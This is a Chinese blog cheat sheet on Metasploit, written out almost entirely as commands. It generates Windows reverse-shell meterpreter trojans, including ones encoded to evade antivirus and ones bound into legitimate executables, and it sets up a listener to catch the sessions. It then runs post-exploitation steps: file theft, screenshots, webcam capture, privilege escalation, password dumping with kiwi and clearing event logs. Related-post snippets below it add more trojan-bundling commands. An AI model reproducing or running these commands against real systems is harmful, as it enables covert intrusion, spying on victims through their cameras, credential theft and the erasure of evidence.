msf的简单使用

已于 2022-09-08 15:44:02 修改
阅读量1k 收藏
点赞数
文章标签: 安全 web安全 系统安全
于 2022-09-08 15:43:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46446401/article/details/126765152
版权

生成木马

生成自带马

msfvenom -p windows/meterpreter/reverse_tcp lhost=x.x.x.x lport=4444 - -f exe -o shell.exe

生成编码马

msfvenom -p windows/meterpreter/reverse_tcp lhost=x.x.x.x lport=4444 -e x86/shikata_ga_nai -i 8 -f exe -o shell.exe

生成捆绑马

msfvenom -x "要捆绑的文件" -p windows/meterpreter/reverse_tcp lhost=x.x.x.x lport=4444 -e x86/shikata_ga_nai -i 8 -f exe -o shell.exe

监听模块使用

use exploit/multi/handler
set payload windows/shell/reverse_tcp(set payload windows/meterpreter/reverse_tcp)(两者区别是拿到会话后进入shell还是进入meterpreter)
options
set lhost x.x.x.x
set lport 4444
run

sessions使用

列出会话
sessions

选择会话
sessions -i

返回会话
background

meterpreter常用命令

系统信息 sysinfo

下载文件 download  目标文件  /root
上传文件 upload   本机文件 目标路径
截图     screenshot
拍照     webcam_snap
打开视频 webcam_stream

提权     getsystem
win7提权
ms_2018_8120

列出进程 ps
进程迁移 migrate 目标进程pid

抓取密码
load kiwi
creds_all

命令清除 clearev

参考文章
https://www.anquanke.com/post/id/235631#h3-9

p%H%p
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
msfconsole
12-12
kail、ubantu的msfconsole平台的用法,如search导入,use调用等等
msfconsole学习
幻心的博客
07-05 2776
工具: Quasar-win AhMyth-andriod
MSF-02-木马捆绑
purvispanwu的博客
08-09 1090
木马捆绑
免杀马学习(MSF捆绑编码)
红队是青春
02-03 496
仅供学习,入行前的笔记,关于免杀效果请勿喷
[一颗花生](仅供学习)纯手工注入msf安卓木马实现捆绑。
2301_77111744的博客
07-01 783
【[一颗花生](仅供学习)纯手工注入msf安卓木马实现捆绑。-- 连接WLAN网络和断开连接 -->-- 新建/修改/删除通话记录 -->-- 读取手机状态和身份 -->-- 查看WLAN连接 -->-- 接收讯息(短信) -->-- 请求忽略电池优化 -->-- 修改您的通讯录 -->-- 拍摄照片和视频 -->-- 查看网络连接 -->-- 修改系统设置 -->-- 读取通话记录 -->-- 防止手机休眠 -->-- 读取联系人 -->-- 发送短信 -->-- 拨打电话 -->
msf简单运用基础篇
12-16
msf简单运用基础篇,一步一步慢慢来。努力加油
msf的一次简单测试 可以看看
03-18
msf我想没人不知道吧 这个是一个msf的小测试 视频不知道丢哪了
msf4j:适用于Java的WSO2微服务框架(MSF4J)
02-20
WSO2 Java微服务框架(MSF4J) WSO2 Java微服务框架(MSF4J)是用于开发和运行微服务的轻量级高性能框架。 WSO2 MSF4J是性能最高的轻量级Java微服务框架之一。... 通过简单的回声测试绘制了各种并发级别的结果
[ MSF ] Meterpreter扩展模块命令详解.docx
02-11
Meterpreter 不仅仅是一个简单的 shell,它是一个完整的后渗透环境,支持多种扩展模块和功能。它能够创建持久化的连接,即使在目标系统重启后也能保持控制。此外,Meterpreter 还允许测试者在不同的会话之间切换,...
php-msf-docs:PHP微服务框架开发手册,即Micro Service Framework For PHP Develop Manual
04-29
本手册从介绍异步、并行、协程等基础概念出发,再到框架如何使用,其中也介绍了部分内部实现的原理,简单易上手。通过学习本手册,再结合我们的demo示例项目,就能够使用构建大规模高性能的微服务化分布式系统。 __...
网络安全之Metasploit使用
qq_52074678的博客
05-05 3341
1.Metasploit-介绍 Mltasploit框架使Metasploit具有良好的可扩展性,它的控制接口负责发现漏洞,攻击漏洞,提交漏洞,然后通过一些接口加入攻击后处理工具和报表工具。Metaspolit框架可以从一个漏洞扫描程序导入数据,使用关于有洞主机的详细信息来发现可攻击漏洞,然后使用有效载荷对系统发起攻击,有效载荷在发现漏洞之后开发一种可行的攻击方法。其用于提取本地系统密码,安装其他软件或控制硬件的模块,这些功能很像以前的BO2K等工具所具备的功能。 2.Ubuntu安装msf 环境准备
msf-Msfvenonm生成Linux后门木马实验
渗透、攻防、CTF、编程
10-12 9669
msf-meterpreter生成Linux后门木马实验 0x01 知识点 MSF工具的利用,msf生成Linux木马后门 0x02 实验环境: 攻击机kaili linux 2020 (ip:192.168.233.131) 攻击机kaili linux 2020 (ip:192.168.233.129) 0x03 实验过程 1、生成Linux后门 131机器打开kali msfconsole 输入 msfvenom -p linux/x64/meterpreter/reve..
Msfvenom
LIVE
04-04 1501
windows: c:\metasploit>msfvenom.bat -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.10.199 LPORT=3080 -e x86/shikata_ga_nai -i 3 -f exe > c:\2.exe c:\metasploit>m...
MSFvenom基础
子曰小玖的博客
05-16 1887
https://www.offensive-security.com/metasploit-unleashed/msfvenom/ https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom kali自带的生成木马工具----Msfvenom Msfvenom是有效负载生成和编码的组合。它于2015年6月8日...
记一次使用msfvenom免杀的学习过程
最新发布
hcufo的博客
09-05 73
一次免杀入门学习,喜欢的盆友快来看呀
Metasploit用户接口(MSF终端、MSF命令行、Armitage)
WEL测试
08-29 5905
2.2Metasploit用户接口          Metasploit软件为它基础功能提供了多个用户接口,包括终端、命令行、图像化界面等。除了这些接口,功能程序(utilities)则提供了对Metasploit框架中内部功能的直接访问。 2.2.1 MSF终端          MSF终端(msfconsole)是目前Metasploit框架最为流行的用户接口,而且MSF终端是Met
Kali利用MSF渗透安卓手机
weixin_51641247的博客
03-29 5208
利用Kali渗透安卓手机; MSF是一个综合性渗透测试工具,集成信息收集、漏洞扫描、漏洞利用以及提权等功能的工具
Metasploit使用教程(操作实例,meterpreter,msfconsole,msfcli,抓包)
qq_44111753的博客
12-13 6101
1、控制Metasploit终端(MSFCONSOLE) MSFCONSOLE主要用于管理Metasploit数据库,管理会话,配置并启动Matasploit模块 一些通用命令: help:该命令允许用户查看执行命令的帮助信息 use module:该命令允许用户加载选择的模块 set optionname module:该命令允许用户为模块设置不同的选项。 run:该命令用来启动一个非渗透攻击模块 search module:该命令允许用户搜索一个特定的模块 exit:退出MSFCONSOLE 操作步骤:
利用msfvenom制作绑定攻击代码的木马程序
m0_43406494的博客
11-13 1022
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.94.135 LPORT=7777 -x putty.exe -k -f exe -o payload.exe o参数指定输出文件名,这里使用payload.exe,一般会改成一些人畜无害的文件名 -x 允许我们指定一个自定义的可执行文件作为模板,也就是将木马捆绑到这个可执行文件上。绑定程序自定义,只要能引诱到目标运行它,这里随便选用putty.exe 选用payload use expl
怎么使用msf安全扫描工具
02-21
使用Metasploit安全扫描工具非常简单,只需要几个步骤:1.下载Metasploit安全扫描工具;2.安装Metasploit安全扫描工具;3.运行Metasploit安全扫描工具;4.扫描系统,查看是否存在安全漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值